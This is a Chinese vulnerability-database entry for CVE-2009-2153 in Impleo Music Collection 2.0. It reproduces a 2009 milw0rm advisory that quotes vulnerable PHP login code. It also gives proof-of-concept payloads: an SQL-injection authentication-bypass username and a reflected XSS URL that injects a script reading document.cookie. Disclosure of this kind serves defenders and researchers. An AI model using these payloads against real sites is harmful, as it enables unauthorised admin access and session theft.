Sappy.Dk Impleo Music Collection index.php跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117976 漏洞类型 跨站脚本
发布时间 2009-06-15 更新时间 2009-06-22
CVE编号 CVE-2009-2153 CNNVD-ID CNNVD-200906-365
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/8947
https://www.securityfocus.com/bid/80575
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-365
|漏洞详情
ImpleoMusicCollection2.0版本的index.php中存在跨站脚本攻击漏洞。远程攻击者可以借助分类参数,注入任意web脚本或HTML。
|漏洞EXP
#################################################################################################################
[+] Impleo Music Collection 2.0 (SQL/XSS) Multiple Remote Vulnerabilities
[+] Download: http://sappy.dk/impleo/download-impleo
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

[+] SQL Injection ( Auth Bypass )

- Requirements : magic_quotes_gpc = off

- Vulnerable code in /admin/login.php

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 $postbruger = $_POST['username'];
 $postpass = md5($_POST['password']); 
 $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'") 
or die("<p>" . mysql_error() . "</p>\n");
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

- PoC 

  Login Username : admin ' or ' 1=1
  Login Password : anything


[+] Cross Site Scripting

- PoC 

    http://127.0.0.1/[path]/index.php?sort="><script>alert(document.cookie)</script>

#################################################################################################################

# milw0rm.com [2009-06-15]
|受影响的产品
Sappy.Dk Impleo Music Collection 2.0
|参考资料

来源:MILW0RM
名称:8947
链接:http://www.milw0rm.com/exploits/8947